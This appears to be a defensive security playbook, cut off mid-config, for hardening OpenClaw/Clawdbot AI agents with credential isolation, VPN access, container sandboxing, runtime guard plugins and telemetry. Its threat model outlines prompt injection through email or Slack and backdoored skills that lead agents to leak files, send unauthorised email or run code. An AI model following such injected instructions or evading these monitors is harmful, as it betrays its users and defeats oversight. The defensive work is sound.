OpenClaw Security Playbook: 7-Layer Defense for AI Agents
OS credential isolation, VPN-only access, container sandboxing, and runtime security for production AI agents

Part 2 of 3 | ← Part 1: Attack Vectors and Verification | → Part 3: Detection and Threat Hunting
The Part 1 immediate mitigations - fixing network binding, rotating credentials, deleting backup files - stop attackers who found your exposed Gateway on Shodan. But they don't address the underlying architectural vulnerabilities.
If you stopped at Part 1, you're still vulnerable to:
Infostealer malware harvesting credentials from your next AI agent deployment (plaintext storage pattern remains)
Prompt injection via email or Slack achieving 91.3% success rate (no runtime guards)
Supply chain attacks through backdoored skills (no integrity monitoring)
Zero visibility into agent behavior when compromise occurs (no telemetry)
Within 72 hours of the January 2026 disclosures, attackers adapted infostealer malware to target these patterns. The Clawdbot vulnerabilities revealed architectural weaknesses affecting the entire AI agent ecosystem - not just one project.
This playbook is for: Security engineers, DevSecOps practitioners, and staff-level developers who own OpenClaw/Clawdbot agent deployments and need a concrete path from "we closed the obvious backdoors" to "we have a hardened, monitored, policy-driven production architecture."
By the end, you'll have: OS-level credential isolation (Keychain/Secret Service), VPN-only access, a hardened container runtime, runtime security plugins (openclaw-shield), supply chain integrity checks, and enterprise telemetry (openclaw-telemetry) — plus a 6-week rollout plan you can hand to your team. If you are running on NVIDIA's OpenShell sandbox, Cisco's DefenseClaw provides a unified implementation of Layers 3–6 and is referenced throughout as an alternative path.
Preflight: Before You Begin
If you haven't completed Part 1, run these verification checks first:
# Check 1: Gateway bound to localhost only
ss -lntp 2>/dev/null | grep 18789
# macOS (no ss): lsof -nP -iTCP:18789 -sTCP:LISTEN
# Expected: 127.0.0.1:18789 (NOT 0.0.0.0:18789)
# Check 2: No backup credential files
find ~/ \( -path "*/.moltbot/*" -o -path "*/.clawdbot/*" \) -name "*.bak*" 2>/dev/null
# Expected: No output
# Check 3: Tool logging enabled
grep -E "toolExecution|logging" ~/.moltbot/config.yml 2>/dev/null
# Expected: enabled: true
If any check fails: Complete Part 1's immediate mitigations before proceeding. Part 2 builds on those foundations.
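Check 1 can also be scripted so it runs in CI or a cron job. The sketch below is illustrative rather than part of any OpenClaw tooling: it assumes `ss -lnt`-style output in which the local address is the fourth column, and the function name and sample text are hypothetical.

```python
def non_loopback_listeners(ss_output: str, port: int = 18789) -> list[str]:
    """Return local addresses listening on `port` that are not loopback."""
    exposed = []
    for line in ss_output.splitlines():
        fields = line.split()
        # Skip the header row and anything that is not a LISTEN socket.
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        local = fields[3]  # e.g. "127.0.0.1:18789" or "[::1]:18789"
        host, _, local_port = local.rpartition(":")
        if local_port != str(port):
            continue
        if host not in ("127.0.0.1", "[::1]"):
            exposed.append(local)
    return exposed


# Hypothetical sample output, for illustration only.
sample = """State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    127.0.0.1:18789    0.0.0.0:*
LISTEN 0      128    0.0.0.0:18789      0.0.0.0:*
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*
"""
print(non_loopback_listeners(sample))
```

An empty list means the Gateway port is bound to loopback only; any entry in the list is a binding that Part 1 should have removed.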
Environment requirements:
Linux/macOS with CLI access (commands tested on Ubuntu 22.04 + macOS 14)
Docker/docker-compose for container sandboxing
Basic familiarity with YAML config, shell commands, and security operations
Defense-in-Depth Strategy for OpenClaw Agents
Traditional application security assumes you can prevent initial compromise through perimeter defenses - firewalls, authentication, input validation. Agentic AI inverts this assumption.
The attack surface includes:
Model layer: Prompt injection manipulates decision-making (91.3% success rate)
Tool layer: Malicious skills introduce backdoored capabilities
Input layer: Untrusted data from email, Slack, Twitter
Storage layer: Credentials in plaintext files with backup persistence
Network layer: Localhost authentication bypass through proxies
You cannot perfectly defend all five layers simultaneously. Defense-in-depth accepts this reality and builds compensating controls.
The Seven-Layer Defense Model
Each layer provides independent protection so that compromise at one layer doesn't cascade:
graph TB
subgraph "Layer 1: Credential Isolation"
A["🔐 OS Keychain/Secret Service"]
end
subgraph "Layer 2: Network Segmentation"
B["🌐 VPN-Only Access"]
end
subgraph "Layer 3: Runtime Sandboxing"
C["📦 Container with Dropped Capabilities"]
end
subgraph "Layer 4: Runtime Security Enforcement"
D["🛡️ openclaw-shield Plugin"]
end
subgraph "Layer 5: Supply Chain Security"
E["✅ Manifest Integrity Checking"]
end
subgraph "Layer 6: Behavioral Monitoring"
F["📊 openclaw-telemetry + SIEM"]
end
subgraph "Layer 7: Organizational Controls"
G["🚨 openclaw-detect + IR Playbook"]
end
A --> B
B --> C
C --> D
D --> E
E --> F
F --> G
classDef infraLayer fill:#2E86AB,stroke:#1A5276,stroke-width:3px,color:#fff
classDef runtimeLayer fill:#00B894,stroke:#0B6B56,stroke-width:4px,color:#fff
classDef orgLayer fill:#6C5CE7,stroke:#4834DF,stroke-width:3px,color:#fff
class A,B,C infraLayer
class D,E,F runtimeLayer
class G orgLayer
Figure 1: Defense-in-depth for OpenClaw AI agents. Each layer provides independent protection. Compromise at Layer 1 (credential storage) is mitigated by Layer 3 (sandboxing). Compromise at Layer 5 (malicious skill) is detected by Layer 6 (behavioral monitoring). Green layers highlight community tools available since February 2026. For OpenShell-based deployments, DefenseClaw (Cisco, April 2026) implements Layers 3–6 as a single governance layer — see the individual layer sections below for integration points.
Threat Model
Primary threats:
External attacker with network access exploiting exposed Gateway port
Infostealer malware on user's machine targeting credential files and backups
Prompt injection via untrusted input achieving 91.3% success rate
Supply chain compromise through malicious skill injection
Insider threat with legitimate access attempting privilege escalation
Out of scope (requires different controls):
Physical access to unlocked machine
Compromised LLM provider API (Anthropic/OpenAI infrastructure breach)
Zero-day vulnerabilities in underlying OS or container runtime
State-level adversaries with custom exploits
6-Week Implementation Roadmap
This roadmap provides incremental deployment with measurable risk reduction at each phase. Each phase maps to one or more defense layers.
Week 1: Stop Active Exploitation (Part 1 Review)
If you haven't completed Part 1:
[ ] Fix network binding (localhost only) - 5-10 min
[ ] Rotate exposed credentials - 45-90 min (5-10 min per service)
[ ] Delete backup files - 2-5 min
[ ] Enable basic logging - 30-45 min
Time investment: 2-3 hours
Risk reduction: ~70% (stops active internet-based attacks)
Week 2: Layer 1 - OS Credential Isolation
[ ] Migrate credentials to OS Keychain/Secret Service
[ ] Verify plaintext files deleted
[ ] Configure Touch ID requirement (optional)
[ ] Test credential access audit logs
Time investment:
Experienced DevSecOps: 10-15 minutes
Mid-level engineer: 20-30 minutes
First-time migration: 45-60 minutes (includes troubleshooting)
Risk reduction: Additional ~15% (defeats infostealer malware)
Week 3-4: Layers 2-3 - Network & Container Sandboxing
Week 3: Layer 2 - VPN Setup
[ ] Deploy VPN (Tailscale or WireGuard)
[ ] Configure ACLs for device allowlisting
[ ] Test remote access via VPN
[ ] Remove reverse proxy if present
Week 4: Layer 3 - Container Hardening
[ ] Build hardened container image
[ ] Test containerized deployment
[ ] Verify capability dropping and read-only filesystem
[ ] Configure minimal volume mounts
Time investment: 8-12 hours total
Risk reduction: Additional ~10% (limits blast radius, eliminates reverse proxy risk)
Week 5: Layers 4-6 - Runtime Security & Monitoring
[ ] Install openclaw-shield plugin
[ ] Enable Prompt Guard and Output Scanner layers
[ ] Deploy openclaw-telemetry for behavioral monitoring
[ ] Configure SIEM forwarding
[ ] Test alerting integration
[ ] Set up skill integrity monitoring (daily cron)
Time investment: 6-8 hours
Risk reduction: Additional ~8% (prevents and detects attacks in real-time)
Week 6: Layer 7 - Organizational Controls
[ ] Deploy openclaw-detect via MDM
[ ] Document security policies
[ ] Establish incident response procedures
[ ] Train security team on agent-specific threats
[ ] Complete production deployment checklist
Time investment: 6-8 hours
Risk reduction: Additional ~2% (governance, discovery, and response capabilities)
Total Implementation
Time: 5-6 weeks (part-time effort)
Coverage: Addresses known failure modes from January-February 2026 disclosures
Residual risk: Novel prompt injection patterns (requires continuous monitoring)
Layer 1: OS-Level Credential Isolation
Framework mapping: OWASP LLM06 (Sensitive Information Disclosure), NIST CSF PR.DS-1 (Data at rest protected)
Problem
Plaintext JSON files containing API keys sit in ~/.moltbot/ with mode 600 permissions. Infostealer malware runs as the user and inherits read access. Backup files persist after deletion, creating a 35-day window of credential exposure through .bak, .bak.1, .bak.2, .bak.3, and .bak.4 files.
Goal
All credentials stored in OS-native secure storage (Keychain on macOS, Secret Service on Linux) that requires explicit user authorization for each access. No plaintext files on filesystem. Credential access creates audit log entries. Optional biometric authentication prevents programmatic theft.
macOS: Keychain Integration
The migration process moves credentials from plaintext JSON to the Keychain, where they're protected by hardware-backed encryption. Each access can create an audit log entry visible in Keychain Access.app.
# Core migration logic - adds credentials to Keychain
security add-generic-password \
-s "Clawdbot-Anthropic" \
-a "api_key" \
-w "${ANTHROPIC_KEY}" \
-T "/Applications/Clawdbot.app" \
-U # Update if exists
# The -T flag authorizes specific apps to access without prompts
# Omit -T to require explicit user approval each time
Security model: Reduces plaintext exposure risk. Infostealer malware attempting access may trigger authorization prompts, depending on configuration. An advanced setup can additionally require Touch ID authentication, creating a visible authorization step that programmatic malware cannot bypass silently.
Linux: Secret Service Integration
Linux uses the freedesktop.org Secret Service specification, implemented by GNOME Keyring or KWallet.
# Core migration logic - stores credential in Secret Service
echo -n "${ANTHROPIC_KEY}" | secret-tool store \
--label="Clawdbot Anthropic API Key" \
service "clawdbot-anthropic" \
account "api_key"
# List all Clawdbot credentials
secret-tool search service clawdbot-anthropic
# Retrieve specific credential (for testing)
secret-tool lookup service clawdbot-anthropic account api_key
→ Complete macOS migration script with credential extraction, error handling, backup procedures, and verification steps.
→ Complete Linux migration script with dependency installation and Secret Service configuration.
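Once credentials live in the OS store, the agent has to read them back at startup instead of opening a JSON file. The following is a minimal sketch of that lookup, assuming the service and account names used in the commands above; the function names are hypothetical and this is not the Gateway's actual loader. It shells out to `security find-generic-password` on macOS and `secret-tool lookup` on Linux.

```python
import subprocess
import sys


def lookup_command(service: str, account: str, platform: str = sys.platform) -> list[str]:
    """Build the argv that reads one secret from the OS credential store."""
    if platform == "darwin":
        # -w prints only the password value to stdout.
        return ["security", "find-generic-password", "-s", service, "-a", account, "-w"]
    if platform.startswith("linux"):
        return ["secret-tool", "lookup", "service", service, "account", account]
    raise NotImplementedError(f"no credential store mapping for {platform!r}")


def fetch_credential(service: str, account: str) -> str:
    """Run the lookup; raises CalledProcessError if the item is missing or access is denied."""
    result = subprocess.run(
        lookup_command(service, account),
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.strip()


print(lookup_command("clawdbot-anthropic", "api_key", platform="linux"))
```

Note that the examples above use different service names per platform ("Clawdbot-Anthropic" on macOS, "clawdbot-anthropic" on Linux), so a caller would pass the name that matches how the item was stored.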
If you want to extend credential isolation beyond the keychain, consider the IronCurtain architecture. IronCurtain separates the agent’s runtime from real secrets: the agent receives a fake API key and submits actions through a trusted proxy. A MITM component swaps in the real credential only at the last moment, so the agent container never holds the secret. A policy engine written in plain English then decides whether to allow, deny or require escalation for each call with default-deny and full audit logs. This pattern protects against runtime theft of credentials and provides a deterministic audit trail for every action.
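The credential-swap idea can be illustrated in a few lines. This is a sketch of the general pattern only, not IronCurtain's API: the `Rule` type, the placeholder key, and the `x-api-key` header name are assumptions made for the example, and the structured rules stand in for IronCurtain's plain-English policies.

```python
from dataclasses import dataclass

# Hypothetical placeholder: the only "credential" the agent container ever holds.
PLACEHOLDER_KEY = "sk-placeholder-not-a-real-key"


@dataclass(frozen=True)
class Rule:
    host: str
    method: str
    decision: str  # "allow" | "deny" | "escalate"


def decide(rules: list[Rule], host: str, method: str) -> str:
    """Default-deny: only an explicit matching rule can allow or escalate."""
    for rule in rules:
        if rule.host == host and rule.method == method:
            return rule.decision
    return "deny"


def rewrite_headers(headers: dict, real_key: str, decision: str) -> dict:
    """Swap the placeholder for the real key, and only on allowed calls."""
    if decision != "allow":
        raise PermissionError(f"request not forwarded: {decision}")
    if headers.get("x-api-key") != PLACEHOLDER_KEY:
        raise ValueError("unexpected credential in agent request")
    return {**headers, "x-api-key": real_key}


rules = [Rule("api.anthropic.com", "POST", "allow")]
audit_log = []
for host in ("api.anthropic.com", "attacker.example"):
    decision = decide(rules, host, "POST")
    audit_log.append((host, "POST", decision))  # every call is recorded, allowed or not
print(audit_log)
```

The real key exists only inside the proxy process, so code running in the agent container can leak nothing more valuable than the placeholder.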
⚡ QUICK WIN
Migrate Credentials to OS Keychain Right Now
What it does: Moves API keys from plaintext JSON files to OS-encrypted storage.
Why it matters: Eliminates the primary infostealer target. Even if malware runs as your user, credential access can require explicit authorization and creates an audit trail.
Time estimate:
Experienced DevSecOps engineer: 10-15 minutes
Mid-level security engineer: 20-30 minutes
First-time credential migration: 45-60 minutes (includes troubleshooting)
Prerequisites:
macOS 10.15+ or Linux with GNOME Keyring/KWallet installed
Basic familiarity with command-line tools
Backup of current credential files (script handles this)
Step 1 - Download migration script:
# macOS
curl -O https://raw.githubusercontent.com/topazyo/openclaw-security-playbook/main/scripts/credential-migration/macos/migrate_credentials_macos.sh
# Review before running (security best practice)
less migrate_credentials_macos.sh
chmod +x migrate_credentials_macos.sh
# Linux
curl -O https://raw.githubusercontent.com/topazyo/openclaw-security-playbook/main/scripts/credential-migration/linux/migrate_credentials_linux.sh
less migrate_credentials_linux.sh
chmod +x migrate_credentials_linux.sh
sudo apt-get install libsecret-tools # Install dependencies
Step 2 - Run migration:
# Creates backup, migrates credentials, securely deletes plaintext
./migrate_credentials_macos.sh # macOS
# OR
./migrate_credentials_linux.sh # Linux
Step 3 - Restart and verify:
# Restart Gateway
systemctl restart moltbot
# Verify no plaintext credentials remain
grep -r "api_key" ~/.moltbot/ ~/.clawdbot/ 2>/dev/null
# Should return NO matches (or only configuration references, not actual keys)
# Verify credentials accessible from Keychain
# macOS: Open Keychain Access.app, search for "Clawdbot"
# Linux: secret-tool search service clawdbot-anthropic
Expected results:
✓ Credentials migrated to Keychain/Secret Service
✓ First Gateway access may prompt for authorization (depends on configuration)
✓ No plaintext keys in filesystem
✓ Backup files securely deleted (3-pass overwrite)
If migration fails:
Check the backup location (printed during migration), typically ~/backups/clawdbot-YYYYMMDD/
Restore:
cp ~/backups/clawdbot-YYYYMMDD/clawdbot.json ~/.moltbot/clawdbot.json
Review troubleshooting guide: Migration failure scenarios
Impact: Reduces plaintext credential exposure. Infostealer malware loses immediate access to credential files. Optional Touch ID requirement adds visible authorization step.
Optional hardening - Touch ID requirement (macOS only):
# Require Touch ID for high-value credentials
# Test on your macOS version first - behavior varies by OS release
security set-generic-password-partition-list \
-s "Clawdbot-Anthropic" \
-a "api_key" \
-S # expects a comma-separated partition list as its value (omitted here)
# Verify: Next credential access should prompt for Touch ID
# If it doesn't, ACL configuration may need adjustment for your OS version
Note: Touch ID enforcement behavior depends on how Keychain items are created and your macOS version. Treat this as risk reduction, not a guarantee. The migration script documents tested configurations.
→ Troubleshooting credential migration for common issues and rollback procedures.
Layer 2: Network Segmentation with VPN
Framework mapping: OWASP LLM05 (Supply Chain Vulnerabilities - network access), NIST CSF PR.AC-5 (Network integrity)
Problem
Reverse proxies introduce authentication bypass vulnerabilities through header spoofing. Even properly configured proxies expand attack surface by exposing the Gateway to the network. Over 1,200 instances were exploited through X-Forwarded-For manipulation and trustedProxies misconfiguration.
Goal
Zero public port exposure. Encrypted point-to-point connections between authenticated devices only. Gateway stays bound to 127.0.0.1. Remote access via VPN eliminates reverse proxy attack surface entirely.
Why VPN > Reverse Proxy
Reverse proxy risks:
Header spoofing attacks (X-Forwarded-For manipulation)
TLS termination exposes plaintext traffic on proxy server
Misconfiguration fails open (grants access instead of denying)
Proxy itself becomes attack target
VPN advantages:
Encrypted tunnel prevents header manipulation
No port exposure (Gateway stays on 127.0.0.1)
Misconfiguration fails closed (no connectivity = no access)
Zero-trust architecture (device authentication required)
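The header-spoofing risk is easy to see in code. The sketch below is a generic illustration, not the Gateway's actual logic: it contrasts a check that believes X-Forwarded-For from any sender with one that honors the header only when the TCP peer is a known proxy. Function names and addresses are hypothetical.

```python
import ipaddress


def client_ip_naive(remote_addr: str, headers: dict) -> str:
    """Vulnerable: believes X-Forwarded-For regardless of who sent it."""
    forwarded = headers.get("X-Forwarded-For")
    return forwarded.split(",")[0].strip() if forwarded else remote_addr


def client_ip_checked(remote_addr: str, headers: dict, trusted_proxies: set[str]) -> str:
    """Honor the header only when the TCP peer is a known proxy."""
    forwarded = headers.get("X-Forwarded-For")
    if forwarded and remote_addr in trusted_proxies:
        # Use the right-most entry: the one the trusted proxy appended itself.
        return forwarded.split(",")[-1].strip()
    return remote_addr


def is_loopback(ip: str) -> bool:
    return ipaddress.ip_address(ip).is_loopback


# An attacker at 203.0.113.7 connects directly and claims to be localhost.
spoofed = {"X-Forwarded-For": "127.0.0.1"}
print(is_loopback(client_ip_naive("203.0.113.7", spoofed)))                  # treated as local
print(is_loopback(client_ip_checked("203.0.113.7", spoofed, {"10.0.0.5"})))  # rejected
```

Even the checked variant depends on the proxy list being configured correctly, which is the fail-open property the comparison above describes.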
Tailscale Setup (Recommended)
Tailscale provides a zero-config VPN built on the WireGuard protocol. Installation creates a private mesh network where only your authenticated devices can reach the Gateway.
# Download and inspect install script (security best practice)
curl -fsSLo install-tailscale.sh https://tailscale.com/install.sh
less install-tailscale.sh # Review before executing
# Run installation
sh install-tailscale.sh
# Authenticate and join your network
sudo tailscale up
# Get your machine's Tailscale IP
tailscale ip -4
# Example output: 100.101.102.103
How it works: Tailscale creates an encrypted tunnel between your devices. The Gateway stays bound to 127.0.0.1, and traffic from your authenticated devices is forwarded to localhost on the Gateway machine. A listener bound only to 127.0.0.1 is not reachable on the Tailscale IP by itself, so this forwarding needs a local forwarder on the Gateway host (for example, Tailscale's serve feature). The Gateway sees connections as coming from 127.0.0.1, but only devices authenticated to your tailnet can reach it. No public port exposure, no authentication bypass risk.
Data path: Client → Tailscale encrypted tunnel → Gateway host network stack → 127.0.0.1:18789 listener. Only Tailscale peers can reach the Gateway; still no public listener.
Verify setup:
# Gateway should still bind to localhost only
ss -lntp 2>/dev/null | grep 18789
# macOS (no ss): lsof -nP -iTCP:18789 -sTCP:LISTEN
# Expected: 127.0.0.1:18789 (NOT 0.0.0.0 or Tailscale IP)
# Access from other devices via: http://100.101.102.103:18789
→ Complete Tailscale setup guide with ACL configuration, device allowlisting, and troubleshooting.
→ WireGuard alternative setup for users who prefer open-source solutions without third-party coordination.
Network Access Control List (ACL)
Tailscale ACLs define which devices can reach which services. This prevents compromise of one device from exposing all services.
{
"acls": [
{
"action": "accept",
"src": ["user@example.com"],
"dst": ["tag:clawdbot:18789"]
}
],
"tagOwners": {
"tag:clawdbot": ["user@example.com"]
}
}
This configuration ensures only devices authenticated as user@example.com can reach port 18789 on machines tagged as clawdbot.
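To reason about what a policy like this permits, it can help to model the match in a few lines. The sketch below is a deliberately simplified model for a single accept rule, not Tailscale's evaluator: it ignores groups, autogroups, port ranges, and tag ownership, and the function name is hypothetical.

```python
policy = {
    "acls": [
        {
            "action": "accept",
            "src": ["user@example.com"],
            "dst": ["tag:clawdbot:18789"],
        }
    ],
    "tagOwners": {"tag:clawdbot": ["user@example.com"]},
}


def is_allowed(policy: dict, src: str, dst_tag: str, port: int) -> bool:
    """Return True only if some accept rule matches; everything else is denied."""
    for rule in policy.get("acls", []):
        if rule.get("action") != "accept" or src not in rule.get("src", []):
            continue
        for dst in rule.get("dst", []):
            # "tag:clawdbot:18789" splits into ("tag:clawdbot", "18789").
            target, _, ports = dst.rpartition(":")
            if target == dst_tag and ports in ("*", str(port)):
                return True
    return False


print(is_allowed(policy, "user@example.com", "tag:clawdbot", 18789))
print(is_allowed(policy, "user@example.com", "tag:clawdbot", 22))
```

The useful property is the default: a source, tag, or port that no rule names is denied without any explicit deny entry.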
→ View complete network segmentation guide with VPN comparison, ACL examples, and firewall integration.
Layer 3: Runtime Sandboxing with Containers
Framework mapping: OWASP LLM08 (Excessive Agency), NIST CSF PR.PT-3 (Least functionality)
Problem
When the agent is compromised via prompt injection or malicious skill, it has full access to the user's filesystem, credentials, and network. A successful prompt injection becomes a privilege escalation path.
Goal
Agent runs in isolated container with dropped capabilities, read-only filesystem, and explicit volume mounts for only necessary directories. Compromise is contained within sandbox boundaries. No persistence across restarts.
Docker Security Configuration
Standard Docker deployment runs with excessive privileges. This hardened configuration drops all capabilities by default, then explicitly grants only required permissions.
# Dockerfile.hardened - Secure container configuration
FROM python:3.11-slim
# Run as non-root user
RUN useradd -m -u 1000 -s /bin/bash clawdbot
USER clawdbot
WORKDIR /home/clawdbot
# Install dependencies
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
# Copy application
COPY --chown=clawdbot:clawdbot . .
# Default command
CMD ["python", "gateway.py"]
Container runtime flags:
docker run \
--name clawdbot \
--network isolated \
--cap-drop ALL \
--read-only \
--tmpfs /tmp:rw,noexec,nosuid,size=100m \
-v ~/.moltbot/skills:/app/skills:ro \
-v ~/.moltbot/logs:/app/logs:rw,noexec \
--security-opt=no-new-privileges \
clawdbot:hardened
# Note: Removed --cap-add NET_BIND_SERVICE (unnecessary for port >1024)
# Gateway uses port 18789, which doesn't require privileged binding
What this prevents:
--cap-drop ALL: Removes all Linux capabilities (can't change users, mount filesystems, modify network config)
--read-only: Prevents writing to container filesystem (stops malware persistence)
--tmpfs /tmp: Temporary directory with noexec, cleared on restart (non-persistent workspace)
--security-opt=no-new-privileges: Prevents privilege escalation
Volume mounts are read-only except for logs (which have noexec)
Even if prompt injection achieves code execution, the blast radius is limited to the container's isolated environment. No filesystem persistence, no capability to modify host system.
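The Week 4 checklist item "verify capability dropping and read-only filesystem" can be checked against a running container. A minimal sketch, assuming you feed it the `HostConfig` object from `docker inspect <container>` (the field names `CapDrop`, `CapAdd`, `ReadonlyRootfs`, `SecurityOpt`, and `Privileged` come from that output; the function name and sample values are hypothetical):

```python
def audit_host_config(host_config: dict) -> list[str]:
    """Return hardening findings; an empty list means all checks passed."""
    findings = []
    if "ALL" not in (host_config.get("CapDrop") or []):
        findings.append("capabilities not dropped (expected CapDrop to include ALL)")
    if host_config.get("CapAdd"):
        findings.append(f"capabilities added back: {host_config['CapAdd']}")
    if not host_config.get("ReadonlyRootfs"):
        findings.append("root filesystem is writable")
    sec_opts = host_config.get("SecurityOpt") or []
    if not any(opt.startswith("no-new-privileges") for opt in sec_opts):
        findings.append("no-new-privileges not set")
    if host_config.get("Privileged"):
        findings.append("container is privileged")
    return findings


# Sample values for illustration; in practice load them with
# json.loads(<output of `docker inspect clawdbot`>)[0]["HostConfig"].
hardened = {"CapDrop": ["ALL"], "CapAdd": None, "ReadonlyRootfs": True,
            "SecurityOpt": ["no-new-privileges"], "Privileged": False}
default = {"CapDrop": None, "CapAdd": None, "ReadonlyRootfs": False,
           "SecurityOpt": None, "Privileged": False}
print(audit_host_config(hardened))
print(len(audit_host_config(default)))
```

Running the audit after every deployment catches drift, for example a compose override that quietly drops `read_only`.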
Filesystem Isolation Strategy
Map only necessary directories into the container:
# docker-compose.yml - Production configuration
services:
clawdbot:
image: clawdbot:hardened
read_only: true
cap_drop:
- ALL
# Note: Removed cap_add - port 18789 doesn't require NET_BIND_SERVICE
volumes:
# Skills - read-only (prevent skill tampering)
- ~/.moltbot/skills:/app/skills:ro
# Logs - read-write but no exec permissions
- ~/.moltbot/logs:/app/logs:rw,noexec
# Config - read-only
- ~/.moltbot/config.yml:/app/config.yml:ro
# CRITICAL: DO NOT MOUNT ~/.ssh, ~/.aws, or credential directories
# Agent reads credentials from OS Keychain via API, not filesystem
tmpfs:
# Temporary workspace - cleared on restart, no execution allowed
- /tmp:rw,noexec,nosuid,size=100m
security_opt:
- no-new-privileges:true
# Use default seccomp profile (do NOT set seccomp:unconfined)
# For advanced hardening, provide custom seccomp profile path
networks:
- isolated
restart: unless-stopped
Critical exclusions: Never mount ~/.ssh, ~/.aws, or credential directories. Agent should read credentials from OS Keychain via API (Layer 1), not direct filesystem access.
Advanced hardening: For production environments requiring maximum security, provide a custom seccomp profile that explicitly allows only required syscalls. Default seccomp is adequate for most deployments; unconfined mode should only be used for debugging and expands syscall attack surface.
→ View complete Docker hardening configuration with orchestration, health checks, and resource limits.
→ Dockerfile.hardened with multi-stage builds and security scanning integration.
→ Runtime sandboxing guide with container security best practices and escape prevention.
April 2026, OpenShell alternative: If your deployment runs on NVIDIA's OpenShell sandbox, DefenseClaw uses OpenShell as its Layer 3 enforcement boundary rather than Docker, providing kernel-level enforcement of filesystem and network I/O constraints. The security properties are equivalent to --cap-drop ALL + --read-only at the container level but enforced by OpenShell's eBPF-based policy engine. If you are running Docker on a non-OpenShell host, the configuration above remains the correct approach. These are two different runtime paths, not competing solutions.
Layer 4: Runtime Security Enforcement
Framework mapping: OWASP LLM01 (Prompt Injection), LLM08 (Excessive Agency), NIST CSF PR.AC & PR.PT
Problem
Even with sandboxing, compromised agents can misuse allowed tools - reading sensitive files, sending unauthorized emails, or executing malicious code within permitted boundaries. The 91.3% prompt injection success rate demonstrates that input validation alone cannot prevent attacks.
Goal
Runtime security plugins inspect and block dangerous tool invocations before execution, validate outputs for secrets, and enforce security policies at the agent layer. Multiple independent defense mechanisms create overlapping protection.
Production-Ready Security Plugin: openclaw-shield
The security community developed native OpenClaw plugins providing defense-in-depth at the runtime layer in direct response to January-February 2026 vulnerabilities.
openclaw-shield (Knostic) provides five independent defense layers as a native OpenClaw plugin:
# Install as OpenClaw plugin
cd ~/.openclaw/plugins
git clone https://github.com/knostic/openclaw-shield
# Configure in OpenClaw settings
# Each layer can be enabled/disabled independently
The five defense layers:
Prompt Guard: Injects security policy into agent context before each turn, instructing the model to refuse dangerous requests
Output Scanner: Redacts secrets (API keys, tokens) and PII from tool output before returning to user
Tool Blocker: Blocks dangerous tool calls at host level based on configurable allowlist/denylist
Input Audit: Logs all inbound messages and flags accidental secret exposure in user input
Behavioral Analysis: Monitors tool execution patterns for anomalous sequences
Each layer is independently toggleable, allowing gradual rollout in production environments without disrupting existing workflows.
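To make the Output Scanner idea concrete, here is a minimal sketch of secret redaction on tool output. It is not openclaw-shield's implementation or rule set: the three patterns are illustrative assumptions (an `sk-ant-` prefixed key, an AWS access key ID, and a bearer token), and a production scanner would need far broader coverage.

```python
import re

# Illustrative patterns only; not the rules openclaw-shield ships.
SECRET_PATTERNS = {
    "anthropic_key": re.compile(r"sk-ant-[A-Za-z0-9_\-]{20,}"),
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "bearer_token": re.compile(r"(?i)\bbearer\s+[A-Za-z0-9._\-]{20,}"),
}


def redact(text: str) -> tuple[str, list[str]]:
    """Replace anything that looks like a secret and report which patterns fired."""
    hits = []
    for name, pattern in SECRET_PATTERNS.items():
        text, count = pattern.subn(f"[REDACTED:{name}]", text)
        if count:
            hits.append(name)
    return text, hits


clean, hits = redact("export AWS_KEY=AKIAABCDEFGHIJKLMNOP # from ~/.aws")
print(clean)
print(hits)
```

Returning the list of matched pattern names alongside the cleaned text lets the same pass feed both the redaction and an audit log entry.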
→ View openclaw-shield with complete configuration guide and layer-specific documentation.
→ Read Knostic implementation blog for architecture decisions and lessons learned from production deployments.
An emerging alternative for runtime interception is AgentGuard, a GoPlus Security tool that intercepts high-risk actions and performs on-demand deep scanning. It blocks malicious skills, prevents writes to sensitive files and performs static analysis to detect secrets, backdoors, prompt-injection and other threats.
JavaScript/TypeScript Alternative: ClawGuard
For agents built with JavaScript/TypeScript frameworks, clawguard (Capsule Security) provides similar runtime protection via NPM package:
import { GuardSystem, guardTool } from 'clawguard';
const guard = new GuardSystem({
strictMode: true,
runtime: {
highRiskTools: ['send_email', 'execute_code'],
rateLimits: {
send_email: { maxCalls: 10, windowMs: 60000 }
},
onApprovalRequired: async (req) => {
return confirm(`Allow ${req.tool} with args: ${JSON.stringify(req.args)}?`);
}
}
});
// Wrap tools with runtime guards
const safeSendEmail = guardTool(originalSendEmail, 'send_email', guard);
ClawGuard uses pre-tool invocation hooks to validate every tool call before execution, with support for rate limiting, approval workflows, and output validation.
→ View clawguard on NPM with complete API reference and TypeScript types.
→ Browse clawguard on GitHub with source code and integration examples.
Native Configuration: Tool Execution Policies
For custom implementations or environments where native plugins aren't available:
# ~/.moltbot/config.yml - Runtime security enforcement
tools:
# Completely disable high-risk tools
disabled:
- "exec"
- "shell"
- "python_repl"
# Require human confirmation for sensitive operations
requireConfirmation:
- tool: "email_send"
confirmationMessage: "Send email to {recipients} with subject: {subject}"
- tool: "file_write"
confirmationMessage: "Write to file: {path}"
# Restrict tool access to specific paths
restricted:
- tool: "file_read"
allowedPaths: ["~/Documents", "~/Projects"]
deniedPaths: ["~/.ssh", "~/.moltbot", "~/.aws"]
# Rate limiting prevents automated exploitation
rateLimits:
email_send:
maxPerHour: 20
browser_action:
maxPerHour: 100
→ View complete tool policy configurations with approval workflows and least-privilege examples.
April 2026, additional runtime option: Cisco's DefenseClaw provides a plugin-based inspection engine that intercepts LLM prompts, completions, and tool invocations at the OpenClaw plugin layer, a different interception point than openclaw-shield's native plugin hooks. DefenseClaw adds CodeGuard, which scans agent-generated code at execution time for secrets exposure, command injection, and unsafe deserialization patterns before the code reaches exec or python_repl. It supports monitor mode (logs everything, blocks nothing; useful for baselining) and action mode (blocks on policy violation).
The two tools cover different interception planes and can be run together:
- openclaw-shield intercepts at the OpenClaw native plugin layer (Prompt Guard, Output Scanner, Tool Blocker)
- DefenseClaw intercepts at the OpenShell governance layer and adds CodeGuard for generated code
For OpenShell deployments, add DefenseClaw's runtime inspection as a second enforcement plane alongside openclaw-shield.
# DefenseClaw runtime inspection config (defenseclaw.config.yml)
runtime:
mode: "action" # "monitor" | "action"
inspect:
prompts: true # Scan incoming prompts for injection patterns
completions: true # Scan LLM outputs before tool dispatch
tool_invocations: true # Intercept tool calls before execution
codeguard:
enabled: true
patterns:
- secrets_exposure
